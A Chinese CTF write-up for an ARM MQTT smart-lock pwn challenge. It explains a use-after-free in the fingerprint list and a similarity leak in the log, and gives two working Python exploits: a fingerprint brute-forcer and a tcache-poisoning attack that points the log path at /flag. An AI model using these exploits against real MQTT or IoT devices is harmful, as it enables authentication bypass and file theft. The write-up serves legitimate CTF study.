new_finger->finger_id = max_finger_id++;
new_finger->next = NULL;
new_finger->retry_count = 0;

if (new_finger == NULL) {
log("Error allocating memory!\n");
exit(1);
}
if (finger_list == NULL)
{
finger_list = new_finger;
finger_pos = new_finger;
} else {
finger_pos->next = new_finger;
finger_pos = new_finger;
}
if( edit_finger(new_finger,(char*)line)){
continue;
}
else {
free(new_finger);
continue;
}
}
fclose(finger_file);

/* inital subscribe*/
subscribe(NULL, "auth_token");
subscribe(NULL, "manager");
subscribe(NULL, "logger");
};

敲重点了!

image.png

首先初始化tls证书,session_id,auth_token,和mqtt的服务器(broker)进行连接

image.png

其次设置门锁状态为锁门,同时打开日志文件

这里初始化了logger(FILE类型),最终这个指针会存放在堆上,而本题的堆地址是固定值

为什么?

image.png

这是qemu虚拟机的结果

image.png

懂了吗?

image.png

这是我wsl的结果,所以这个系统ALSR随机化保护开的比较低,堆地址是固定的

image.png

接着从/etc/mosquitto/fingers_credit读出一个指纹数据(实则是长度为20的int数组),然后再程序中初始化一下指纹链表

image.png

image.png

最后订阅了这三个主题

image.png

mqtt_lock的析构函数

image.png

add函数,对应的堆题中的增函数,是一个比较经典的链表增添堆块类型,有个很明显的uaf,如果edit失败,new_finger这个指针会被free但是还在指针链表中

image.png

edit函数,format_finger为空指针,就会返回false,而这里根据前面对change_finger_format函数的分析,只要指纹数据里有字母,就会edit失败

由此可以利用uaf漏洞

image.png

remove操作,对应堆题中的删函数,操作没有什么漏洞

image.png

check_finger函数,这里会计算指纹的相似度,然后存放到日志中,后面有可以读取日志的操作,所以存在信息泄露,由此我们可以猜测出远端的指纹信息,具体exp如下

import paho.mqtt.client as mqtt
from time import sleep
import ssl
import re
import time
import random

# MQTT Broker Configuration
BROKER = "127.0.0.1"
PORT = 8883
CAFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/ca.crt"
CERTFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.crt"
KEYFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.key"
YELLOW = "\033[93m"
BLUE = "\033[94m"
END = "\033[0m"
auth_token_topic = "auth_token"
valid_token_topic = "validtoken123123"
logfile_topic = "logfile"
logger_topic = "logger"

fingerprint_array = [0] * 20  # 初始化数组,包含20个0

def extract_similarity_from_eof(log_messages):
"""从日志列表中提取 EOF 上一行的相似度百分比。"""
if len(log_messages) < 2:
return None
eof_index = len(log_messages) - 1
second_last_message = log_messages[eof_index - 1]
match = re.search(r"finger similarity:%([\d\.]+)", second_last_message)
return float(match.group(1)) if match else None

def on_message(client, userdata, msg):
"""回调函数,用于处理接收到的消息。"""
userdata.append(msg.payload.decode())

def perform_bruteforce():
results = []

# 设置订阅者以监听日志
print("[DEBUG] Setting up MQTT client for subscription...")
client = mqtt.Client(userdata=results)
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE, cert_reqs=ssl.CERT_NONE)
client.tls_insecure_set(True)
client.on_message = on_message

client.connect(BROKER, PORT, 60)
client.subscribe(logfile_topic)
client.loop_start()

# 验证 Token
print("[DEBUG] Publishing authentication token...")
client.publish(auth_token_topic, "validtoken123123")
time.sleep(2)
fingerprint_array = [0] * 20
random_array = [0] * 20
for i in range(20):
print(f"[DEBUG] Starting binary search for index {i}...")
left, right = 1, 2 ** 31 - 1  # 设置最大值为 2^31 - 1
while True:  # 修改为基于相似度的条件
random_array[i] = random.randint(left, right)  # 随机选择一个值
real_array = fingerprint_array.copy()
payload = f"[{','.join(map(str, random_array))}]"
print(f"[DEBUG] Publishing guess for index {i}: {payload}")
client.publish(valid_token_topic, payload)
time.sleep(0.5)

# 请求日志
print(f"[DEBUG] Requesting log data...")
client.publish(logger_topic, "download")
time.sleep(0.5)

# 等待相似度响应
if len(results) >= 2:  # 确保有足够的消息提取 EOF 上一行
similarity = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: {YELLOW}{random_array[i]}{END} : {BLUE}{similarity}{END}")

if similarity is None:
print("[DEBUG] No similarity data found, retrying...")
continue
P = similarity * 20 / 100
x1 = int(P * random_array[i])
x2 = int(random_array[i] // P)
# 两个分别发送一下看看比例
print(x1, x2)
real_array[i] = x1
client.publish(valid_token_topic, f"[{','.join(map(str, real_array))}]")
print(f"[DEBUG] Publishing guess for index {i}: {real_array}")
client.publish(logger_topic, "download")
sleep(1)
similarity1 = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: x1:{YELLOW}{x1}{END} : {BLUE}{similarity1}{END}")
real_array[i] = x2
client.publish(valid_token_topic, f"[{','.join(map(str, real_array))}]")
print(f"[DEBUG] Publishing guess for index {i}: {real_array}")
client.publish(logger_topic, "download")
sleep(1)
similarity2 = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: x2:{YELLOW}{x2}{END} : {BLUE}{similarity2}{END}")
if similarity1 > similarity2:
fingerprint_array[i] = x1
similarity = similarity1
else:
fingerprint_array[i] = x2
similarity = similarity2
random_array[i] = 0

if similarity >= 4.75 * (i + 1):
print(f"[DEBUG] Target similarity reached: {similarity} >= {4.75 * (i + 1)}")
break  # 达到目标相似度时结束循环

client.loop_stop()
client.disconnect()

print("Final fingerprint array:", fingerprint_array)
# fingerprint_array的逗号之间不要有空格
print("Final fingerprint array:", ','.join(map(str, fingerprint_array)), end="\n")

if __name__ == "__main__":
perform_bruteforce()

原理如下:

第一次我对第一位随机发送一个数,其余全是0,程序会计算出相似度,记为S,相似比为P(min(随机数Random,真实指纹数据Real)/max(随机数Random,真实指纹数据Real))则S=(P/20)*100,由于S可以泄露,则P=(S/100)*20,则一定有Real/Random=P或者Random/Real=P,即Real=P*Random或Real=Random/P

image.png

对应这段代码

然后我们把计算出来的两个可能真实值都发一遍,看看哪个相似度更高,哪个就是真实值

image.png

最后我们还要保证总相似度达到90%,保险起见,这里设置的阈值是95%=4.75%*20

image.png

日志写入函数,不多说了

image.png

download函数,其实就是堆题中的show函数,也就是这里可以泄露日志,clear函数,就是重新打开一遍日志文件,相当于把之前的清空了

image.png

开关门函数,其实就设置了一个状态,没什么用

void mqtt_lock::on_message(const struct mosquitto_message *message)
{

if(!strcmp(message->topic, "auth_token")){
if (auth_token) {
unsubscribe(NULL, auth_token);
// log("close subncribe:%s\n",auth_token);
free(auth_token);
}
auth_token = (char*)malloc(0x11);
char * payload = (char*)message->payload;
for (int i = 0; i<0x10;i++) {
if ((payload[i] <= '9' && payload[i] >= '0') || (payload[i] <= 'Z' && payload[i] >= 'A') || (payload[i] <= 'z' && payload[i] >= 'a')) {
auth_token[i] = payload[i];
} else {
log("auth_token error: token must be num or letter\n");
free(auth_token);
auth_token = NULL;
return;
}
}
auth_token[0x10] = 0;
log("auth_token:%s\n",auth_token);
char re_auth_token[20];
snprintf(re_auth_token, 20, "re_%s", auth_token);

subscribe(NULL, auth_token);

publish(NULL, re_auth_token, 11, "finger tap\n");
// log("open subncribe:%s\n",auth_token);

return;

}
else if(!strcmp(message->topic, "manager")) {
/*
{
"session": "a1b2c3d4e5",
"request": "add_finger",
"req_args": [
"john_doe",
"password123",
]
}*/
// add_finger edit_finger remove_finger lock_door unlock_door
char *payload = (char*)message->payload;
char *session = nullptr;
char *request = nullptr;
char *req_args[2] = {nullptr, nullptr};
bool paese_res = parse_json(payload, &session, &request, req_args);
if (!paese_res) {
log("json parse error\n");
return;
}
if (!session_id || strcmp(session,session_id)) {
log("session id mismatch\n");
goto END;
}
char output[1024];
if (!strcmp(request,"add_finger")) {
if (req_args[0] && req_args[0][0]== '[' && req_args[0][strlen(req_args[0])-1] == ']') {
if (add_finger(req_args[0])) {
snprintf(output,1024,"new finger id:%d\n",max_finger_id-1);
publish(NULL,session_id,strlen(output),output);
goto END;
}
}
snprintf(output,1024,"add finger failed\n");
publish(NULL,session_id,strlen(output),output);
goto END;
}
else if (!strcmp(request,"edit_finger")) {
if(!req_args[0] || !req_args[1]) {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
if (req_args[1][0] != '[' || req_args[1][strlen(req_args[1])-1] != ']') {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
unsigned int finger_id = atoi(req_args[0]);
for (fingers * finger = finger_list; finger != NULL; finger = finger->next) {
if (finger->finger_id == finger_id) {
if (edit_finger(finger,req_args[1])) {
snprintf(output,1024,"changed finger id:%d\n",finger_id);
publish(NULL,session_id,strlen(output),output);
goto END;
} else {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
}
}
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
else if (!strcmp(request,"remove_finger")) {
if (!req_args[0]) {
publish(NULL,session_id,21,"remove finger failed\n");
goto END;
}
unsigned int finger_id = atoi(req_args[0]);
if (remove_finger(finger_id)) {
snprintf(output,1024,"removed finger id:%d\n",finger_id);
publish(NULL,session_id,strlen(output),output);
goto END;
}
else {
publish(NULL,session_id,21,"remove finger failed\n");
goto END;
}
}
else if (!strcmp(request,"lock_door")) {
if (lock_door()) {
publish(NULL,session_id,18,"lock door success\n");
goto END;
} else {
publish(NULL,session_id,17,"lock door failed\n");
goto END;
}
}
else if (!strcmp(request,"unlock_door")) {
if (unlock_door()) {
publish(NULL,session_id,20,"unlock door success\n");
goto END;
} else {
publish(NULL,session_id,19,"unlock door failed\n");
goto END;
}
}
END:
if(session) free(session);
if(request) free(request);
if(req_args[0]) free(req_args[0]);
if(req_args[1]) free(req_args[1]);
return;
}
else if(!strcmp(message->topic, "logger")) {
char * payload = (char*)message->payload;
if (!auth_token){
publish(NULL, "logfile", 15, "not authorized\n");
return;
}
if (!strcmp(payload,"download")) {
download_log();
}
else if (!strcmp(payload,"clear")) {
clear_log();
}
}
else if(auth_token && !strcmp(message->topic, auth_token)) {
char * payload = (char*)message->payload;
char re_auth_token[20];
snprintf(re_auth_token, 20, "re_%s", auth_token);
fingers* cur_finger = finger_list;
while (cur_finger != NULL) {
if (check_finger(cur_finger,payload)) {
if (session_id) {
free(session_id);
unsubscribe(NULL, session_id);
}
session_id = (char*)malloc(0x11);
for (int i = 0; i<0x10;i++) {
session_id[i] = session_nums[(rand()%62)];
}
session_id[0x10] = 0;
char output_session[0x30];
snprintf(output_session, 0x30, "login successed. session_id: %s\n", session_id);
publish(NULL, re_auth_token, strlen(output_session), output_session);
return;
}
cur_finger = cur_finger->next;
}
publish(NULL, re_auth_token, 13, "login failed\n");
}
}

本题中最重要的函数,也就是mqtt客户端接收到信息的回调函数——on_message

image.png

首先是登录处理逻辑

这里需要用户在auth_token话题自定义一个token,然后系统会订阅token这个话题,此时auth_token不再为空,如果有新的token,会将原先的覆盖掉

image.png

如果话题是logger,那么就可以查看日志文件,泄露指纹信息,这里只要求auth_token有值,所以我们只需要一开始随意登录一下就可以了

image.png

这里对应的是身份认证处理逻辑,在登录(auth_token不为空)之后,就要发送指纹信息,随后check_finger函数就会检测是否是有效指纹,如果是,则会返回一个session_id

image.png

最后是manager话题,首先这个话题会利用parse_json函数解析出session,request,req_args这三个参数,随后会比较用户发送的session_id是否和成功认证返回的session_id相一致,如果一致,则会根据request对应的请求执行增删改操作

image.png

添加指纹操作

image.png

修改指纹操作

image.png

删除指纹操作

image.png

开关门操作

image.png

其他回调函数不重要

如何调试

准备gdbserver

由于本题是arm架构,所以首先你要准备一个arm架构的gdbserver,我是直接从FirmAE里面找gdbserver了

image.png

这里我选择用python起一个http服务,通过网络进行传输

修改启动脚本

这里我们要把启动脚本修改成如下代码

qemu-system-arm -m 512 -M virt,highmem=off \
-kernel zImage \
-initrd rootfs.cpio \
-net nic \
-net user,hostfwd=tcp::8883-:8883,hostfwd=tcp::1234-:1234 \
-nographic \
-monitor null

增添一个端口映射,这里我选择是1234,用于连接gdbserver,这个端口可以随意选择

传输gdbserver

我们需要将我们wsl里面的gdbserver传到qemu虚拟机里,幸运的是qemu虚拟机里自带了wget命令,因此我们直接通过网络传输即可

wget http://172.26.25.103:8000/gdbserver.armel
mv gdbserver.armel /bin/gdbserver
chmod +x /bin/gdbserver

gdbserver附加到现有进程

ps看一下进程

image.png

gdbserver --attach :1234 63

在本机中启动gdb-multiarch,然后输入

set architecture arm
set endian little
target remote localhost:1234
set glibc 2.38

由于这题是2.38版本的堆,所以需要额外设置一下libc版本

image.png

就可以愉快的开启调试了

EXP讲解

完整EXP如下

import paho.mqtt.client as mqtt
from pwn import *
import time
from time import sleep
import ssl
import re
import json

# MQTT Broker 配置
BROKER = "0.0.0.0"

PORT = 8883
# PORT = 50806
CAFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/ca.crt"
CERTFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.crt"
KEYFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.key"
AUTH_TOKEN_TOPIC = "auth_token"
VALID_TOKEN_TOPIC = "validtoken123123"
SESSION_ID_TOPIC = "#"  # 一开始订阅所有主题 (#)
mytime = 1
# 用于存储接收到的消息
received_messages = []

def pay(input_str, mylen=80):
# 如果字符串长度小于80,使用复制方式填充至80
while len(input_str) < mylen:
input_str += input_str

# 确保字符串的长度恰好为80
input_str = input_str[:mylen]

# 初始化结果数组
result = []

# 每4个字符一组
for i in range(0, len(input_str), 4):
# 取4个字符
chunk = input_str[i:i + 4]

# 将4个字符转换为对应的十六进制数字
hex_value = 0
for char in chunk:
hex_value = (hex_value << 8) + ord(char)

# 将结果添加到数组中
result.append(hex_value)

return result

def on_connect(client, userdata, flags, rc):
"""连接到 MQTT Broker 时的回调函数"""
print(f"Connected to MQTT Broker with result code {rc}")
client.subscribe(SESSION_ID_TOPIC)  # 订阅所有主题 (#),获取所有消息

def on_message(client, userdata, msg):
"""接收到消息时的回调函数"""
print(f"Received message on topic {msg.topic}: {msg.payload.decode()}")
userdata.append(msg.payload.decode())  # 保存接收到的消息

def publish_message(client, topic, message):
"""发布消息到指定的 MQTT 主题"""
print(f"Publishing message to {topic}: {message}")
client.publish(topic, message, qos=1)

def send_auth_token(client):
"""发送 auth_token 消息"""
message = "validtoken123123"
publish_message(client, AUTH_TOKEN_TOPIC, message)

def send_finger_data(client):
"""发送指纹数据"""
finger_data = "[1373378270,39159,3669886736,2494,2,515555555,2945791524,9283885,155241,259,30956741,169525,4196208728,2948318370,231700,2380113,8528,1416626613,3520135119,42949672977]"
# finger_data = "[1373378309,39159,2147483775,2494,2,515555574,2147483758,9283884,155241,259,30956739,169525,2147483479,2147483548,231699,2380112,8528,1416626458,2147483496,292]"
publish_message(client, VALID_TOKEN_TOPIC, finger_data)

def extract_session_id(messages):
"""从接收到的消息中提取 session_id"""
for message in messages:
match = re.search(r"session_id\s*[:=]\s*([a-zA-Z0-9]+)", message)
if match:
return match.group(1)  # 返回提取到的 session_id
return None

def convert_array_to_string(array):
"""自动将数组转换为字符串,格式为 "[\"element1\",\"element2\",...]",确保没有空格"""
return "[" + ",".join(f"{item}" for item in array) + "]"

def send_edit(client, session_id, index, payload):
"""发送 edit_finger 命令,确保 req_args 符合格式"""
req_args = [
str(index),  # 第一个元素是索引,确保是字符串类型
payload,
]
json_message = {
"session": session_id,
"request": "edit_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化,确保所有字符串都用双引号包裹
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_add_command(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
payload = pay(payload, 88)
req_args = [
convert_array_to_string(payload)  # 指纹数据转为字符串格式
]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_add(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_log(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "logger", "download")
sleep(mytime)

def send_malloc(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id + " aaaabaa////flagaeaaafaaagaaahaaaiaaajaaakaaalaa\x0a\x0aaaanaaaoaaapa" + "/flag" + "\x10\x00\x00\x00\x00\x00\x00",
"request": "kiddingyou",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_remove_command(client, session_id, index):
"""发送 remove_finger 命令,确保 req_args 符合格式"""
payload = pay("12345678")
req_args = [
f"{index}", convert_array_to_string(payload)
]
json_message = {
"session": session_id,
"request": "remove_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def main():
# 创建 MQTT 客户端实例
client = mqtt.Client(userdata=received_messages)

# 配置 SSL 连接
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)
client.tls_insecure_set(True)

# 设置回调函数
client.on_connect = on_connect
client.on_message = on_message

# 连接到 MQTT Broker
print(f"Connecting to MQTT Broker at {BROKER}:{PORT}...")
client.connect(BROKER, PORT, 60)

# 启动接收消息的循环
client.loop_start()

# 发送认证 token
send_auth_token(client)
print("\033[33mSent auth token and finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 发送有效的指纹数据
send_finger_data(client)
print("\033[33mSent finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 获取 session_id,监听接收到的消息
print("Waiting for session_id...")
time.sleep(mytime)  # 等待一段时间来接收消息

# 提取 session_id 并根据 session_id 去订阅该 session 的主题
session_id = extract_session_id(received_messages)

# session_id="02wakqZtjQ5rDm9G"

if session_id:
print(f"Session ID received: {session_id}")
# 这里用第一个命令行参数
offset = 0

# 订阅该 session_id 主题并等待接收指纹管理相关的消息
client.subscribe(f"{session_id}")
# 取消订阅全部
client.unsubscribe(SESSION_ID_TOPIC)
time.sleep(mytime)  # 等待消息
# 2 add free
send_add(client, session_id,
"[1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
pause()
# uaf 修改fd为自己-8
heap = 0x387898 + offset
xor = (heap - 8) ^ (heap >> 12)
send_edit(client, session_id, 2,
f"[{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]")
pause()
# 申请到自己3
send_add(client, session_id,
"[1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 申请到自己-8,为4
pause()
send_add(client, session_id,
"[0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 此处修改next,为日志路径
log_path = 0x35b1f0 + offset
send_edit(client, session_id, 3, f"[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]")
send_remove_command(client, session_id, 3)
send_remove_command(client, session_id, 1)
tmp1 = 0x39d8e0 + offset
tmp2 = 0x389108 + offset
tmp3 = 0x35b4d8 + offset
tmp4 = 0x399c20 + offset
tmp5 = 0x39a240 + offset
send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]")
pause()
client.subscribe("#")
send_log(client, session_id, "/flag")
if "flag{" in received_messages or "TPCTF{" in received_messages or "tpctf{" in received_messages:
flag = (received_messages)
return flag
return 0
else:
print("No session ID found in received messages.")

# 停止 MQTT 客户端的循环并断开连接
client.loop_stop()
client.disconnect()

if __name__ == "__main__":
main()

接下来我们详细讲一下exp的原理

# 创建 MQTT 客户端实例
client = mqtt.Client(userdata=received_messages)

# 配置 SSL 连接
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)
client.tls_insecure_set(True)

# 设置回调函数
client.on_connect = on_connect
client.on_message = on_message

# 连接到 MQTT Broker
print(f"Connecting to MQTT Broker at {BROKER}:{PORT}...")
client.connect(BROKER, PORT, 60)

# 启动接收消息的循环
client.loop_start()

首先是mqtt服务器的初始化操作,后面都可以直接拿来复用,目的是链接mqtt的broker,初始化接收消息,完成连接等操作的回调函数

# 发送认证 token
send_auth_token(client)
print("\033[33mSent auth token and finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 发送有效的指纹数据
send_finger_data(client)
print("\033[33mSent finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 获取 session_id,监听接收到的消息
print("Waiting for session_id...")
time.sleep(mytime)  # 等待一段时间来接收消息

# 提取 session_id 并根据 session_id 去订阅该 session 的主题
session_id = extract_session_id(received_messages)

然后就是要发送认证token,发送成功之后,获得一个会话,然后如果指纹验证成功,就可以获得该会话的session_id,而正确的指纹数据就是通过前面的爆破exp获得

# 2 add free
send_add(client, session_id,
"[1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
pause()
# uaf 修改fd为自己-8
heap = 0x387898 + offset
xor = (heap - 8) ^ (heap >> 12)
send_edit(client, session_id, 2,
f"[{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]")
pause()
# 申请到自己3
send_add(client, session_id,
"[1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 申请到自己-8,为4
pause()
send_add(client, session_id,
"[0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 此处修改next,为日志路径
log_path = 0x35b1f0 + offset
send_edit(client, session_id, 3, f"[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]")
send_remove_command(client, session_id, 3)
send_remove_command(client, session_id, 1)
tmp1 = 0x39d8e0 + offset
tmp2 = 0x389108 + offset
tmp3 = 0x35b4d8 + offset
tmp4 = 0x399c20 + offset
tmp5 = 0x39a240 + offset
send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]")

这一段就是攻击的核心代码,接下来结合调试进行讲解,建议读者在阅读时逐行下断点调试查看

image.png

第一次目的是制造uaf

刚刚malloc完:

image.png

被free掉之后:

image.png

然后利用edit修改:

image.png

由于log字符串对应的伪造堆块,在finger_id偏移处值为0x271,所以下一次edit要设置finger_id为0x271=625,其余值保持不变即可

send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]"

这也就是为什么最后一次edit要有一个莫名其妙的625出现的原因

image.png

可以看到此时log字符串已经修改成了/flag

image.png

复现成功!

image.png